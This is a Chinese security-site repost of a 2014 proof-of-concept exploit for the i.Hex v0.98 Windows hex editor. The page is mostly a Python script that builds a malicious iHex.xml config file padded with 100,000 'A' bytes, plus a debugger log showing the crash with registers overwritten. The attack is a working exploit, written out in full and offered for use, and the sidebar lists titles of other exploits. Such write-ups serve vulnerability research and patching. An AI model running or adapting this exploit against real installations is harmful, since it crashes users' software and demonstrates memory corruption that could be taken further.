首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
i.Hex Local Crash Proof of Concept Exploit
来源:twitter.com/m3tac0m 作者:metacom 发布时间:2014-11-11  
#Exploit Title:i.Hex Local Crash Poc
#Software Link:www.memecode.com/data/ihex-win32-v0.98.exe
#Version:i.Hex-v0.98 (Win32 Release)
#Description:i.Hex is a small and free graphical Hex Editor for Windows..
#Tested on:Win7 32bit 
#Exploit Author:metacom --> twitter.com/m3tac0m
#Date:05.11.2014
'''
Immunity Debugger Log data
EAX 0135B8F8 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ECX 41414141
EDX 41414141
EBX 01363FA0
ESP 0012F6D8
EBP 0012F700
ESI 0135B8F0
EDI 005F0000
EIP 77B85FBD ntdll.77B85FBD
  
Press Shift+9
Log data, item 0
Address=77B85B44
Message=[15:56:05] Access violation when reading [41414141]
'''
print "\n[*]Vulnerable Created iHex.xml!"
print "[*]Copy iHex.xml to C:\Program Files\Memecode\i.Hex"
print "[*]Start i.Hex"
print "[*]------------------------------------------------"
poc="\x41" * 100000
header = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22"
header += "\x55\x54\x46\x2d\x38\x22\x20\x3f\x3e\x0a\x3c\x4f\x70\x74\x69\x6f\x6e\x73\x20\x49\x73\x48\x65\x78\x3d\x22\x31\x22\x0a\x09"
header += "\x20\x4c\x69\x74\x74\x6c\x65\x45\x6e\x64\x69\x61\x6e\x3d\x22\x0a" + poc
footer = "\x22\x0a\x09\x20\x50\x6f\x73\x3d\x22\x31\x30\x30\x2c\x31\x30\x30\x2c\x35\x30\x30\x2c\x34\x30\x30\x22\x3e\x0a\x09\x3c\x4d"
footer += "\x72\x75\x20\x49\x74\x65\x6d\x73\x3d\x22\x30\x22\x0a\x09\x09\x20\x49\x74\x65\x6d\x30\x3d\x22\x22\x20\x2f\x3e\x0a\x3c\x2f"
footer += "\x4f\x70\x74\x69\x6f\x6e\x73\x3e\x0a"
payload= header + footer
# Write out our malicious file
writeFile = open ("iHex.xml", "wb")
writeFile.write( payload )
writeFile.close()

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·i-FTP Buffer Overflow SEH Expl
·i.Mage Local Crash Proof of Co
·X7 Chat 2.0.5 lib/message.php
·Citrix NetScaler SOAP Handler
·Linux/x86 Add map in /etc/host
·Belkin n750 jump login Paramet
·Linux Local Root => 2.6.39 (32
·PicsArt Photo Studio For Andro
·Drupal < 7.32 Pre Auth SQL Inj
·ManageEngine Eventlog Analyzer
·Mac OS X Mavericks IOBluetooth
·tnftp "savefile" Arbitrary Com
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved